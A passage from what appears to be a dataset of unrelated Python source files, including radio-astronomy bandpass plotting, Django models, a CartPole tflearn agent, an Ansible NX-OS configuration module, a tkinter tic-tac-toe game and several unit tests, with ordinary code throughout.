        if nwait>5:
            print("ERROR: Waited more than 5 sec for disk2file! Something is wrong, exiting...")
            sys.exit(1)
        time.sleep(1) # Wait for disk2file
        nwait+=1
    # Read file
    fh = vdif.open(disk2fileout, 'rs', sample_rate=sample_rate*u.MHz) # Need to specify sample rate, too short to autodetect.
    start_time = fh.info()['start_time']
    # Ensure file pointer is at beginning of file
    fh.seek(0)
    # Read all data until end
    ifdata = fh.read()
    # Close infile
    fh.close()
    return [nbbcs, ifdata, start_time]
def plot_bbc(bbcdata, bbc, nif):
    """Draw one BBC's power spectrum and sampler statistics into the grid.

    Uses module-level plot state (axs, nrows, bbcsperIF, sample_rate, nspec,
    bbcw, iflabels, start_time).  ``bbcdata`` is a 1-D array of quantized
    sample values for this BBC.
    """
    # Rows fill bottom-up so IF 0 ends up on the bottom row.
    row=(nrows-1)-nif
    col=bbc-nif*bbcsperIF # Assume nbbcs always the same
    nfft = bbcdata.size
    # Fraction of samples in each distinct sample state.
    states = np.unique(bbcdata, return_counts=True)
    sampler_stats = states[1]/nfft
    ps = np.abs(np.fft.fft(bbcdata))**2
    time_step = 1.0/sample_rate
    freqs = np.fft.fftfreq(nfft, time_step)
    idx = np.argsort(freqs)
    # Spectrum is conjugate from - to +, only plot half...
    nplot = int(nfft/2)
    ps2plot = ps[idx][nplot:]
    # Decimate signal to 128 points
    down = int(nplot/nspec)
    ps2plot_dec = resample_poly(ps2plot, 1, down)
    fr2plot = np.linspace(0,bbcw, nspec)
    # Plot
    # Alternate trace colour per IF for readability.
    if nif%2==0:
        color = "black"
    else:
        color= "red"
    ax = axs[row][col]
    ax.plot(fr2plot, ps2plot_dec, color=color)
    if col==0:
        # Leftmost column carries the IF label and recording start time.
        ax.set_ylabel("IF "+ str(iflabels[nif]) + "\n"+str(start_time)[:-5].replace("T","\n"), rotation=0, ha='right', va="center")
    ax.text(0.5, 0.35, "BBC{0:03d}".format(bbc+1), transform=ax.transAxes, ha="center")
    #print("BBC{0:03d} sampler stats: {1} %".format(bbc+1, np.round(100*sampler_stats,1)))
    # Draw sampler-state fractions as a stacked bar along the bottom of the
    # axes (axes coordinates); states 0 and 3 blue, the rest green.
    start=0
    for i,stat in enumerate(sampler_stats):
        #if i%2==0:
        if i in [0,3]:
            scol = "blue"
        else:
            scol = "green"
        ax.add_patch(patches.Rectangle( (start,0), width=stat, height=0.25, edgecolor="black", facecolor = scol, fill=True, transform=ax.transAxes))
        start +=stat
    # Vertical markers at fixed fractions of the band — NOTE(review):
    # purpose of the 0.18/0.33 split assumed, confirm with author.
    itot = 0
    for i in [0.18,0.33,0.33]: # last 0.18 not necessary
        itot+=i
        ax.axvline(x=itot*bbcw)
    ax.set_xlim([0,bbcw])
# --- Command-line configuration ---
ip = sys.argv[1] #ip = "localhost"
port = sys.argv[2] #port = "2621" # jive5ab control port
bbcw = int(sys.argv[3]) #bbcw = 32 # MHz, width of BBC
nspec = int(sys.argv[4]) #nspec = 256 # number of points in final spectrum
bbcsperIF = int(sys.argv[5]) #bbcsperIF = 8
DEBUG=False# Print jive5ab return messages, which are parsed for results
ifs2plot = [0,1,2,3,4,5,6,7] # List IFs to plot, starting from 0.
#Plot design
nrows = 8
ncols = bbcsperIF
extractiontime = "0.01s" # At least 0.01s
iflabels = ["A", "B", "C", "D", "E", "F", "G", "H"]
plt.rcParams.update({'font.size': 8})
sample_rate = 2*bbcw # MHz
scriptdir=os.path.dirname(os.path.realpath(__file__))
# Ask the recorder for the currently loaded scan to learn its name.
scres = fbcmd("scan_check?")
if "does not exist" in scres:
    # Error reply quotes the name; pull it out from between the quotes.
    vbsfile = scres.split(":")[1].split("'")[1].strip()
else:
    vbsfile = scres.split(":")[2].strip() # ignore spaces around filename
if vbsfile[-2]=="_":
    # Multi-file name, ignore the suffix for the initial pattern
    vbsfile = vbsfile[:-2]
print("Processing VBS name " + vbsfile)
#vbsname = "testrec_freja_210526_161523"
# Prepare plot
f,axs = plt.subplots(nrows, ncols, sharex=True, figsize=(8,4), dpi=300)
# Strip all ticks so the grid of tiny spectra stays readable.
for a in axs:
    for b in a:
        b.set_yscale("log")
        b.yaxis.set_major_locator(plt.NullLocator())
        b.yaxis.set_minor_locator(plt.NullLocator())
        b.xaxis.set_major_locator(plt.NullLocator())
        b.xaxis.set_minor_locator(plt.NullLocator())
        # Remove top double line except from top row
        if not b in axs[0]:
            b.spines["top"].set_visible(False)
plt.subplots_adjust(left=0.125, right=0.975, top=0.925, bottom=0.05, hspace=0, wspace=0)
# Check if dealing with single-file. If so, vmux, then read all data sequentially and split
singlefile, nbbcs, data, start_time = get_singlefile_data(vbsfile)
if not singlefile:
    recmode = "multifile"
    # Failed single-file, try multi-file:
    for nif in ifs2plot:
        nbbcs, data, start_time = get_multifile_data(vbsfile, nif)
        if nbbcs>0: #Check if data was found
            for i in range(nbbcs):
                bbc = nbbcs*nif + i
                # Slice out bbc from all data
                bbcdata = data[:, i].astype(int) # bbc, converted to 4 integer states (2-bit): -3, -1, +1, +3
                plot_bbc(bbcdata, bbc, nif)
else:
    # Singlefile, so step through all BBCs, assuming bbcperif BBCs for each IF
    recmode = "vmuxed"
    for bbc in range(nbbcs):
        nif = int(bbc/bbcsperIF)
        # Slice out bbc from all data
        bbcdata = data[:, bbc].astype(int) # bbc, converted to 4 integer states (2-bit): -3, -1, +1, +3
        plot_bbc(bbcdata, bbc, nif)
f.suptitle(vbsfile+": " + recmode + ", "+extractiontime + ". log10 spectra: {} points per {} MHz. Blue/green = sampler stats.".format(nspec,bbcw))
f.savefig(scriptdir+"/bandpass.pdf",dpi=300)
|
8,007 | 9dfbf14a2005aad87be82e5e482c6b0347f32f2c | # Generated by Django 3.2.9 on 2021-11-10 13:36
from django.db import migrations, models
class Migration(migrations.Migration):
    """Widen every model's implicit ``id`` primary key to ``BigAutoField``."""

    dependencies = [
        ('settings', '0003_auto_20210814_2246'),
    ]

    # All models whose auto-created ``id`` field is switched to 64-bit.
    _MODELS = (
        'building', 'group', 'lessontype', 'other', 'patterns', 'room',
        'roomtype', 'salary', 'staff', 'student', 'subjects', 'teacherrole',
        'teachertypes', 'timetable', 'userprofile',
    )

    operations = [
        migrations.AlterField(
            model_name=model_name,
            name='id',
            field=models.BigAutoField(auto_created=True, primary_key=True,
                                      serialize=False, verbose_name='ID'),
        )
        for model_name in _MODELS
    ]
|
8,008 | 1825b365032a224ed56a1814d7f6457e2add8fdd | import csv
# Explode the comma-separated violation codes of each inspection (column 20)
# into one (inspection_id, violation) row per code.
#
# Fixes: the input was opened in 'rb', which is Python-2-only -- csv.reader
# on Python 3 requires text mode.  Both files now use newline='' as the csv
# module documents, so rows are not double-spaced on Windows.
with open('healthviolations.csv', 'w', newline='') as fp:
    with open('Restaurant_Inspections.csv', 'r', newline='') as csvfile:
        reader = csv.reader(csvfile)
        header = next(reader, None)
        writer = csv.writer(fp, delimiter=',')
        writer.writerow([header[0], "violation"])
        for row in reader:
            if row[20] != '':
                violationarr = row[20].split(",")
                for violation in violationarr:
                    writer.writerow([row[0], violation])
|
8,009 | 7789e54acc02fe0277ff80ce14efbcdc4ee6e7f1 | import gym
import random
import numpy as np
import statistics
from collections import Counter
import tflearn
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
#setup the Cartpole environment
env = gym.make("CartPole-v0")
env.reset()
#----------Explore CartPole-------------#
#exploring the observations, rewards, actions
def explore_cartpole():
    """Play two fully random episodes, rendering and logging every step."""
    for episode in range(2):
        obs = env.reset()
        for step in range(100):
            env.render()
            print(obs)
            act = env.action_space.sample()
            obs, reward, done, info = env.step(act)
            print("Action: ", act, "Rewards", reward)
            if done:
                print("Episode finished after {} timesteps".format(step + 1))
                break
#explore_cartpole()
#----------Collect Training Data-------------#
#collect data from successful games by running x games
#successful would be say, lasting more than 100 frames
num_games = 20000
num_episodes = 201 #game would end at 200 episodes
min_score = 75
def initial_games():
    """Play `num_games` random games and harvest training data.

    Only games scoring at least `min_score` are kept; each kept frame is a
    [previous_observation, one_hot_action] pair.
    """
    train_data = []
    train_scores = []
    for _ in range(num_games):
        frames = []
        previous = []
        total = 0
        for _ in range(num_episodes):
            # Exploration policy: pure random actions.
            move = random.randrange(0, 2)
            obs, reward, done, info = env.step(move)
            # The very first frame has no previous observation to label.
            if len(previous) > 0:
                frames.append([previous, move])
            previous = obs
            total += reward
            if done:
                break
        if total >= min_score:
            train_scores.append(total)
            # One-hot encode the chosen action for the classifier head.
            for frame in frames:
                one_hot = [1, 0] if frame[1] == 0 else [0, 1]
                train_data.append([frame[0], one_hot])
        env.reset()
    return train_data
#----------Build the FC NN model-------------#
#building a simple multi-layer fully connected model
#this model can be generally used to play games like cartpole
#would try training the model on other games in OpenAI environment
def nn_model(input_size):
    """Build the fully connected policy network as a tflearn DNN.

    Five relu blocks (128-256-512-256-128, each with 0.8-keep dropout)
    followed by a 2-way softmax trained with Adam on cross-entropy.
    """
    net = input_data(shape=[None, input_size, 1], name='input')
    for width in (128, 256, 512, 256, 128):
        net = fully_connected(net, width, activation='relu')
        net = dropout(net, 0.8)
    net = fully_connected(net, 2, activation='softmax')
    net = regression(net, optimizer='adam', learning_rate=1e-3,
                     loss='categorical_crossentropy', name='targets')
    return tflearn.DNN(net, tensorboard_dir='log')
#----------Train the model-------------#
def train_model(train_data, model=False):
    """Fit `model` on (observation, one-hot action) pairs; build one if absent."""
    features = np.array([sample[0] for sample in train_data]).reshape(
        -1, len(train_data[0][0]), 1)
    labels = [sample[1] for sample in train_data]
    if not model:
        model = nn_model(input_size=len(features[0]))
    model.fit({'input': features}, {'targets': labels}, n_epoch=5,
              snapshot_step=500, show_metric=True, run_id='openai_learning')
    return model
# Collect random-play data, train the policy net, then evaluate it greedily.
train_data = initial_games()
#print("Size of training data",len(train_data))
model = train_model(train_data)
#----------Predict actions for the games-------------#
num_final_games = 10
target_episodes = 201
all_rewards = []
all_actions = []
for _ in range(num_final_games):
    total_score = 0
    prev_obs = []
    env.reset()
    for _ in range(target_episodes):
        #env.render()
        #instead of randomly choosing the action, predict the actions
        if len(prev_obs) == 0:
            # First frame of a game: no observation yet, act randomly once.
            action = random.randrange(0,2)
        else:
            # Greedy action: argmax of the network's softmax output.
            action = np.argmax(model.predict(prev_obs.reshape(-1,len(prev_obs),1))[0])
        all_actions.append(action)
        #let's run the game
        observation, reward, done, info = env.step(action)
        prev_obs = observation
        total_score += reward
        if done:
            break
    all_rewards.append(total_score)
#----------Print results-------------#
print('Average reward:',np.mean(all_rewards), '+-', np.std(all_rewards))
print('Max reward:', max(all_rewards))
|
8,010 | 3e7df9a733c94b89d22d10883844c438444d5e2c | from __future__ import unicode_literals
from django.db import models
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.dispatch import receiver
PROFILE_PIC_PATH = 'users/profile_pic'
class Profile(models.Model):
    """Per-user profile extending Django's built-in User via a one-to-one link."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    bio = models.TextField(max_length=500, blank=True)
    # Optional avatar image, stored under PROFILE_PIC_PATH.
    image = models.ImageField(null=True, blank=True, upload_to=PROFILE_PIC_PATH)
    birth_date = models.DateField(null=True, blank=True)
|
8,011 | 746971cd6c5bf65268e89303c8f4ce98a56eb111 | #!/usr/bin/env python2
# -*- coding: utf8 -*-
from __future__ import print_function, division, absolute_import
from flask.ext.login import current_user
from . import cert_record_process as record_process_base
from walis.thirdparty import thrift_client, thirdparty_svc
from walis.exception.util import raise_user_exc
from walis.exception.error_code import CERT_UPDATE_ERR
TRestaurantCertification = thirdparty_svc.ers.TRestaurantCertification
CERTIFICATION_TYPE_NONE = 0
RESTAURANT_NOT_EXIST_ID = -1
CERTIFICATION_NOT_EXIST = -2
CertType = thirdparty_svc.ers.CertificationConst
STATUS_PENDING = CertType.STATUS_PENDING
STATUS_PASSED = CertType.STATUS_PASSED
STATUS_FAILED = CertType.STATUS_FAILED
TYPE_CERT_PERSONAL = thirdparty_svc.ers.RestaurantConst.CERTIFICATION_TYPE_PERSONAL
TYPE_CERT_CORP = thirdparty_svc.ers.RestaurantConst.CERTIFICATION_TYPE_CORP
def get(restaurant_id):
    """Fetch one restaurant's certification record from the ERS service."""
    with thrift_client('ers') as ers:
        cert = ers.get_restaurant_certification(restaurant_id)
        # Thrift hands back unicode; callers expect utf-8 bytes (Python 2 codebase).
        cert.comment = cert.comment.encode('utf-8')
        return cert
def get_by_status(status, offset=0, limit=thirdparty_svc.ers.MAX_LIST_SIZE):
    """Page through certification records with the given status.

    The caller's `limit` is now honoured, capped at 250 to protect the ERS
    backend.  (The previous code overwrote the parameter with 250
    unconditionally, silently ignoring whatever the caller asked for.)
    """
    limit = min(limit, 250)
    with thrift_client('ers') as ers:
        return ers.query_restaurant_certification_by_status(
            status, offset, limit)
def add(cert):
    """Create a certification record and write an audit entry for the upload."""
    with thrift_client('ers') as ers:
        ers.add_restaurant_certification(cert)
    # Audit trail: record the transition into "pending review".
    record_process_base.add(
        cert.restaurant_id,
        cert.type,
        CERTIFICATION_NOT_EXIST,
        STATUS_PENDING,
        comment='上传个人认证信息' if cert.type ==
        TYPE_CERT_PERSONAL else '上传企业认证信息')
    return ''
def update(cert):
    """Modify an existing certification; fail if the restaurant has none."""
    with thrift_client('ers') as ers:
        db_cert = ers.get_restaurant_certification(cert.restaurant_id)
        if not db_cert:
            raise_user_exc(CERT_UPDATE_ERR, restaurant_id=cert.restaurant_id)
    with thrift_client('ers') as ers:
        ers.update_restaurant_certification(cert)
    # Audit trail: an edit puts the record back into "pending review".
    record_process_base.add(
        cert.restaurant_id,
        cert.type,
        cert.status,
        STATUS_PENDING,
        comment='修改认证信息')
    return ''
def process_certification(restaurant_id, status_to):
    """Move a restaurant's certification to `status_to` as the current user."""
    with thrift_client('ers') as ers:
        ers.process_certification(current_user.id,
                                  restaurant_id, status_to)
def get_latest_record(restaurant_id):
    """Return (comment, status_to) of the newest processing record.

    Falls back to ('', CERTIFICATION_NOT_EXIST) when no record exists.
    """
    latest = record_process_base.get_latest_record(
        restaurant_id)
    if latest:
        return latest.comment, latest.status_to
    return '', CERTIFICATION_NOT_EXIST
|
8,012 | 99b5ac74da95dff399c31d58e19bac65e538a34b | def main():
' main entry point for module execution\n '
argument_spec = dict(src=dict(type='path'), replace_src=dict(), lines=dict(aliases=['commands'], type='list'), parents=dict(type='list'), before=dict(type='list'), after=dict(type='list'), match=dict(default='line', choices=['line', 'strict', 'exact', 'none']), replace=dict(default='line', choices=['line', 'block', 'config']), running_config=dict(aliases=['config']), intended_config=dict(), defaults=dict(type='bool', default=False), backup=dict(type='bool', default=False), save_when=dict(choices=['always', 'never', 'modified'], default='never'), diff_against=dict(choices=['running', 'startup', 'intended']), diff_ignore_lines=dict(type='list'), save=dict(default=False, type='bool', removed_in_version='2.4'), force=dict(default=False, type='bool', removed_in_version='2.2'))
argument_spec.update(nxos_argument_spec)
mutually_exclusive = [('lines', 'src', 'replace_src'), ('parents', 'src'), ('save', 'save_when')]
required_if = [('match', 'strict', ['lines']), ('match', 'exact', ['lines']), ('replace', 'block', ['lines']), ('replace', 'config', ['replace_src']), ('diff_against', 'intended', ['intended_config'])]
module = AnsibleModule(argument_spec=argument_spec, mutually_exclusive=mutually_exclusive, required_if=required_if, supports_check_mode=True)
warnings = list()
nxos_check_args(module, warnings)
result = {
'changed': False,
'warnings': warnings,
}
config = None
info = get_capabilities(module).get('device_info', {
})
os_platform = info.get('network_os_platform', '')
if (module.params['replace'] == 'config'):
if ('9K' not in os_platform):
module.fail_json(msg='replace: config is supported only for Nexus 9K series switches')
if module.params['replace_src']:
if (module.params['replace'] != 'config'):
module.fail_json(msg='replace: config is required with replace_src')
if (module.params['backup'] or (module._diff and (module.params['diff_against'] == 'running'))):
contents = get_config(module)
config = NetworkConfig(indent=2, contents=contents)
if module.params['backup']:
result['__backup__'] = contents
if any((module.params['src'], module.params['lines'], module.params['replace_src'])):
match = module.params['match']
replace = module.params['replace']
candidate = get_candidate(module)
if ((match != 'none') and (replace != 'config')):
config = get_running_config(module, config)
path = module.params['parents']
configobjs = candidate.difference(config, match=match, replace=replace, path=path)
else:
configobjs = candidate.items
if configobjs:
commands = dumps(configobjs, 'commands').split('\n')
if module.params['before']:
commands[:0] = module.params['before']
if module.params['after']:
commands.extend(module.params['after'])
result['commands'] = commands
result['updates'] = commands
if (not module.check_mode):
load_config(module, commands)
result['changed'] = True
running_config = None
startup_config = None
diff_ignore_lines = module.params['diff_ignore_lines']
if module.params['save']:
module.params['save_when'] = 'always'
if (module.params['save_when'] != 'never'):
output = execute_show_commands(module, ['show running-config', 'show startup-config'])
running_config = NetworkConfig(indent=1, contents=output[0], ignore_lines=diff_ignore_lines)
startup_config = NetworkConfig(indent=1, contents=output[1], ignore_lines=diff_ignore_lines)
if ((running_config.sha1 != startup_config.sha1) or (module.params['save_when'] == 'always')):
result['changed'] = True
if (not module.check_mode):
cmd = {
'command': 'copy running-config startup-config',
'output': 'text',
}
run_commands(module, [cmd])
else:
module.warn('Skipping command `copy running-config startup-config` due to check_mode. Configuration not copied to non-volatile storage')
if module._diff:
if (not running_config):
output = execute_show_commands(module, 'show running-config')
contents = output[0]
else:
contents = running_config.config_text
running_config = NetworkConfig(indent=1, contents=contents, ignore_lines=diff_ignore_lines)
if (module.params['diff_against'] == 'running'):
if module.check_mode:
module.warn('unable to perform diff against running-config due to check mode')
contents = None
else:
contents = config.config_text
elif (module.params['diff_against'] == 'startup'):
if (not startup_config):
output = execute_show_commands(module, 'show startup-config')
contents = output[0]
else:
contents = output[0]
contents = startup_config.config_text
elif (module.params['diff_against'] == 'intended'):
contents = module.params['intended_config']
if (contents is not None):
base_config = NetworkConfig(indent=1, contents=contents, ignore_lines=diff_ignore_lines)
if (running_config.sha1 != base_config.sha1):
if (module.params['diff_against'] == 'intended'):
before = running_config
after = base_config
elif (module.params['diff_against'] in ('startup', 'running')):
before = base_config
after = running_config
result.update({
'changed': True,
'diff': {
'before': str(before),
'after': str(after),
},
})
module.exit_json(**result) |
8,013 | 841743d4e9d683827962d83a77a87c6432842add | import tkinter as tk
from functools import partial
from numpy import random
from base import NinePalaceGame
class SingleMode(NinePalaceGame):
    """Tic-tac-toe against a randomly playing computer opponent (tkinter)."""
    # Default marks; reassigned in set_O_or_X once the user picks a side.
    player1 = player = 'O'
    player2 = computer = 'X'
    def __init__(self):
        self.create_choose_one_window()
        super().__init__()
        self.main_game_window.mainloop()
    def player_play(self, i, j):
        """Place the player's mark at cell (i, j); return 1 if the move was legal."""
        if not self.game_is_over and not self.box[i][j]:
            self.box[i][j] = 1
            self.value_group[i][j].set(self.dominance)
            self.dominance = self.computer
            return 1
        return 0
    def computer_play(self):
        """Computer move: sample random cells until a free one is found."""
        if not self.game_is_over:
            while 1:
                i, j = random.choice(range(3)), random.choice(range(3))
                if not self.box[i][j]:
                    self.box[i][j] = 1
                    self.value_group[i][j].set(self.computer)
                    self.dominance = self.player
                    break
    def judge(self):
        """Update the billboard when either side wins or the board fills up."""
        if self.check_win(self.player):
            self.game_is_over = 1
            self.billboard_value.set('Player is win!')
        elif self.check_win(self.computer):
            self.game_is_over = 1
            self.billboard_value.set('Computer is win!')
        elif self.check_game_over():
            self.game_is_over = 1
            self.billboard_value.set('Game over!')
    def reset(self):
        """Clear the board and return to the mark-selection window."""
        super().reset()
        self.dominance = self.player
        self.box = [
            [0, 0, 0], [0, 0, 0], [0, 0, 0]]
        self.main_game_window.withdraw()
        self.choose_one_window.update()
        self.choose_one_window.deiconify()
    def button_function(self, i, j):
        """Cell-click handler: player moves, then the computer answers."""
        if self.player_play(i, j):
            self.judge()
            self.computer_play()
            self.judge()
    def set_O_or_X(self, use):
        """Assign marks from the user's choice; picking X lets the computer open."""
        self.player = use
        if use == 'X':
            self.computer = 'O'
            self.computer_play()
        else:
            self.computer = 'X'
        self.dominance = self.player
        self.choose_one_window.withdraw()
        self.main_game_window.update()
        self.main_game_window.deiconify()
    def create_choose_one_window(self):
        """Build the O-or-X selection window shown before each game."""
        self.choose_one_window = tk.Toplevel(self.main_game_window)
        self.choose_one_window.title('choose one window')
        self.choose_one_window.geometry('500x500')
        choose_one_window_billboard = tk.StringVar(
            master=self.choose_one_window, value='Choose you want')
        use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,
                              height=5, textvariable=choose_one_window_billboard)
        use_O_or_X.pack()
        use_O = tk.Button(self.choose_one_window, text='I want use O', width=40,
                          height=5, command=partial(self.set_O_or_X, 'O'))
        use_O.pack()
        use_X = tk.Button(self.choose_one_window, text='I want use X', width=40,
                          height=5, command=partial(self.set_O_or_X, 'X'))
        use_X.pack()
if __name__ == '__main__':
game = SingleMode()
|
8,014 | c04c38d78144b6f5d3e5af4ebe9ce430e882a367 | import numpy as np
def get_train_batches(data_dir='/home/yunhan/batchified'):
    """Yield (X, Y) training batches 1-53 in random order, X scaled to [0, 1]."""
    batch_ids = np.random.permutation(53) + 1
    for batch_id in batch_ids:
        features = np.load("%s/X%d.npy" % (data_dir, batch_id)) / 255.
        labels = np.load("%s/y%d.npy" % (data_dir, batch_id)).reshape(-1)
        yield features, labels
def get_evaluate_batches(data_dir='/home/yunhan/batchified'):
    """Yield (X, Y) validation batches 54-71 in random order, X scaled to [0, 1]."""
    batch_ids = np.random.permutation(18) + 54
    for batch_id in batch_ids:
        features = np.load("%s/X%d.npy" % (data_dir, batch_id)) / 255.
        labels = np.load("%s/y%d.npy" % (data_dir, batch_id)).reshape(-1)
        yield features, labels
def get_test_batches(data_dir='/home/yunhan/batchified'):
    """Yield (X, Y) test batches 72-89 in random order, X scaled to [0, 1]."""
    batch_ids = np.random.permutation(18) + 72
    for batch_id in batch_ids:
        features = np.load("%s/X%d.npy" % (data_dir, batch_id)) / 255.
        labels = np.load("%s/y%d.npy" % (data_dir, batch_id)).reshape(-1)
        yield features, labels
def get_batches_mono(data_dir):
    """Load the whole training set at once as a single batch tuple.

    NOTE(review): `data_dir` is ignored -- the paths below are hard-coded;
    confirm whether it should be interpolated like the other loaders.
    Returns a one-element list of (X, Y, 32, 0.2); presumably
    (features, labels, batch_size, validation_split) -- verify against caller.
    """
    X = np.load('/home/yunhan/data_dir/train_x_224.npy')
    # X = np.load('train_x_sample.npy')
    X = X / 255
    # X = np.load('/home/yunhan/data_dir/train_x_224.npy')
    Y = np.load('/home/yunhan/data_dir/train_y_224.npy')
    # Y = np.load('train_y_sample.npy')
    return [(X, Y, 32, 0.2), ]
def get_test_data_batches(data_dir='/home/yunhan/data_dir'):
    """Yield the 17 test feature arrays X_3000 ... X_51000, scaled to [0, 1]."""
    for step in range(1, 18):
        yield np.load("%s/X_%d.npy" % (data_dir, 3000 * step)) / 255.
|
8,015 | fe82a46a7965b27729ff5bd61c1059416c96cae7 | print("""Hello world""")
# Same greeting printed twice; quote style unified.
print("Hello again")
print("Hello again")
8,016 | 108c8bbb4d3dbc6b7f32e084b13009296b3c5a80 | import serial
import time
def main():
    """Echo lines arriving on a serial port forever (stop with Ctrl-C)."""
    # '/dev/tty****' is your port ID
    con=serial.Serial('/dev/tty****', 9600)
    print('connected.')
    # Infinite read loop; `str` shadows the builtin but is local to this loop.
    while 1:
        str=con.readline() # byte code
        print (str.strip().decode('utf-8')) # decoded string
if __name__ == '__main__':
main()
|
8,017 | 62ca95a871c16191fb8f56213646e8173f400630 | import streamlit as st
st.write('hi') |
8,018 | a1c5d86a3f042d9e5ba522726191c8aeb9b738ed | import os
from dataclasses import dataclass
from dotenv import load_dotenv
from fastapi.security import OAuth2PasswordBearer
from passlib.context import CryptContext
load_dotenv()
@dataclass
class Settings:
    """JWT/auth configuration pulled from the environment."""
    # NOTE(review): no type annotations, so @dataclass generates no fields here;
    # these stay plain class attributes. Confirm whether annotations were intended.
    SECRET_KEY = os.getenv("SECRET_KEY", "mysecret")
    ALGORITHM = "HS256"
    ACCESS_TOKEN_EXPIRE_MINUTES = 30

# Module-wide bcrypt password context and OAuth2 bearer scheme.
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="token")

settings = Settings()
|
8,019 | 8cfab525ab3a86dd6964475d5621fdc7c6413e38 | """Secret Garden tests."""
from secret_garden import Decoder, SecretGarden
import random
filename = "pr08_example_data.txt"
key = "Fat Chocobo"
d = Decoder(filename, key)
s = SecretGarden(filename, key)
def test_read_from_file():
    """Reading the example file yields a 7-element list with no raw newlines."""
    lines = d.read_code_from_file()
    assert isinstance(lines, list)
    assert len(lines) == 7
    assert "\n" not in d.read_code_from_file()
def test_decode_from_base64():
    """Each base64 line of the example file decodes to the known payload."""
    expected = [")-.7)-AOO", "-57)-0JASJAOOASJ", ")07)2AJSAJAJOAJJAAO",
                ".7)/AJSSAJSJOOSSOOOS", "-,70", ",7)-,OAASSOSOAAASAAAAA",
                ".7).SOSAOJAOOO"]
    decoded = [d.decode_from_base64(line) for line in d.read_code_from_file()]
    assert decoded == expected
def test_calculate_cipher_step():
    """Cipher step is a stable int for a fixed key and changes with the key.

    The previous version also compared the result against a ``random.Random``
    *instance* -- an int is never equal to one, so that assertion was vacuous
    and has been dropped.
    """
    given_value = d.calculate_cipher_step()
    assert type(given_value) == int
    assert given_value == 1016
    new_decoder = Decoder(filename, "HELLO THERE!")
    new_value = new_decoder.calculate_cipher_step()
    assert new_value != given_value
def test_decode():
    """Decoding yields 7 messages, each containing the newline separator."""
    messages = d.decode()
    assert type(messages) == list
    assert len(messages) == 7
    assert messages[0] == '-12;-1\n\nESS'
    assert messages[-1] == '2;-2\n\nWSWESNESSS'
    assert all("\n" in message for message in messages)
def test_decode_messages():
    """SecretGarden.decode_messages matches Decoder.decode and depends on the key."""
    assert d.decode() == s.decode_messages()
    other_key_result = SecretGarden(filename, "HELLO, STUDENTS.").decode_messages()
    assert other_key_result != d.decode()
def test_find_secret_locations():
    """Locations decode to the known list of integer coordinate pairs.

    The previous version built tuples of ``random.Random`` *instances* for
    its inequality check; those can never equal integer tuples, so the check
    asserted nothing.  Compare against a genuinely different list instead.
    """
    expected = [(-11, -3), (20, -13), (1, -3), (-2, -5), (10, 4), (6, -13), (2, -6)]
    locations = s.find_secret_locations()
    assert type(locations) == list
    for location in locations:
        assert type(location) == tuple
    assert locations == expected
    # A deliberately wrong list of the same length must not compare equal.
    assert locations != [(0, 0)] * len(expected)
|
8,020 | 2a3f9c4518df337cfc5e4b1816e7b2b4af62c101 | #!/usr/bin/env python3
import unittest
import solution
class TestMethods(unittest.TestCase):
    """Tests for solution.Solution.addTwoNumbers over linked-list numbers.

    Fix: the last test was a second ``test_example_2``, which silently
    shadowed (and therefore disabled) the earlier test of the same name;
    it is renamed ``test_example_3``.
    """

    def LinkedListFromArray(self, values):
        """Build a singly linked list from `values`; None for an empty list."""
        if len(values) > 0:
            headNode = solution.ListNode(values[0], None)
            tailPtr = headNode
            if len(values) > 1:
                for value in values[1:]:
                    tailPtr.setNext(solution.ListNode(value))
                    tailPtr = tailPtr.getNext()
            return headNode
        else:
            return None

    def printLinkedList(self, headNode):
        """Debug helper: print the list as a Python array."""
        print(self.linkedListToArray(headNode))

    def linkedListToArray(self, headNode):
        """Collect node values into a plain list for easy comparison."""
        result = []
        current = headNode
        while current:
            result.append(current.getValue())
            current = current.getNext()
        return result

    def checkLinkedListsAreEqual(self, headNodeA, headNodeB):
        """True when both lists hold the same values in the same order."""
        valuesA = self.linkedListToArray(headNodeA)
        valuesB = self.linkedListToArray(headNodeB)
        return valuesA == valuesB

    def test_example_1(self):
        sol = solution.Solution()
        l1 = self.LinkedListFromArray([2, 4, 3])
        l2 = self.LinkedListFromArray([5, 6, 4])
        expected = [7, 0, 8]
        self.assertEqual(self.linkedListToArray(sol.addTwoNumbers(l1, l2)), expected)

    def test_example_steve7411(self):
        # Single-digit carry: 9 + 1 = 10.
        sol = solution.Solution()
        l1 = self.LinkedListFromArray([9])
        l2 = self.LinkedListFromArray([1])
        expected = [0, 1]
        self.assertEqual(self.linkedListToArray(sol.addTwoNumbers(l1, l2)), expected)

    def test_example_2(self):
        sol = solution.Solution()
        l1 = self.LinkedListFromArray([0])
        l2 = self.LinkedListFromArray([0])
        expected = [0]
        self.assertEqual(self.linkedListToArray(sol.addTwoNumbers(l1, l2)), expected)

    def test_example_3(self):
        # Was a duplicate `test_example_2`; renamed so both tests run.
        sol = solution.Solution()
        l1 = self.LinkedListFromArray([9, 9, 9, 9, 9, 9, 9])
        l2 = self.LinkedListFromArray([9, 9, 9, 9])
        expected = [8, 9, 9, 9, 0, 0, 0, 1]
        self.assertEqual(self.linkedListToArray(sol.addTwoNumbers(l1, l2)), expected)
if __name__ == '__main__':
unittest.main()
|
8,021 | 3f4b05a1d0c4c2a2b085a0265bafbf89b5635e31 | import pandas as pd
import statistics
import csv
# Summary statistics for the height column, then the share of samples
# falling within 1, 2 and 3 standard deviations of the mean.
df = pd.read_csv("height-weight.csv")
heightlist = df["Height(Inches)"].to_list()
weightlist = df["Weight(Pounds)"].to_list()

height_mean = statistics.mean(heightlist)
height_median = statistics.median(heightlist)
height_mode = statistics.mode(heightlist)
height_stdev = statistics.stdev(heightlist)
print(height_mean)
print(height_median)
print(height_mode)
print(height_stdev)

band_counts = []
for k in (1, 2, 3):
    lower = height_mean - k * height_stdev
    upper = height_mean + k * height_stdev
    band_counts.append(len([h for h in heightlist if lower < h < upper]))
for count in band_counts:
    print(count * 100 / len(heightlist))
|
8,022 | b137fc40a5b2dec63c7abb6953664a969f5c126f | def equals(left, right, tol=0.001):
"""
Tests equality of left and right
Rosalind allows for a default [absolute] error of 0.001 in decimal
answers unless otherwise stated.
"""
try:
left = left.strip()
right = right.strip()
except AttributeError:
pass
try:
left = float(left)
right = float(right)
return abs(left - right) <= tol
except ValueError:
